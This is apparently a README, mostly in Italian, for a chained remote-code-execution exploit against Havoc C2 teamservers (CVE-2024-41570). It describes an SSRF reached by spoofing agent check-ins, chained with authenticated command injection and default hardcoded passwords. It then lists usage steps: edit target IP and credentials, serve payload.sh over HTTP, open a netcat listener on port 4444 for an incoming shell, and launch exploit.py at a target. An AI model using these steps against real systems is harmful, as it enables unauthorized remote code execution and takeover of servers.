
Questa è una RCE concatenata nel framework Havoc C2 utilizzando i PoC di github.com/chebuya e github.com/IncludeSecurity
Questa è una RCE concatenata (CVE-2024-41570) nel framework Havoc C2.
Iniezione di comandi: Havoc è vulnerabile all'iniezione di comandi, consentendo a un utente autenticato di eseguire comandi sul Teamserver. Interessa le versioni dalla 0.3 fino all'ultima release 0.6. Il profilo predefinito di Havoc contiene password hardcoded, quindi un operatore C2 abbastanza imprudente da usare il profilo predefinito su una rete pubblica può essere immediatamente sfruttato.
SSRF: questa vulnerabilità viene sfruttata falsificando la registrazione di un agente demon e i relativi check-in per aprire un socket TCP sul teamserver e leggere/scrivere dati da esso. Ciò consente agli attaccanti di divulgare gli IP di origine dei teamserver e molto altro.
Catena: abusare della SSRF per consegnare un payload di iniezione di comandi autenticato.

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
Crediti a @chebuya e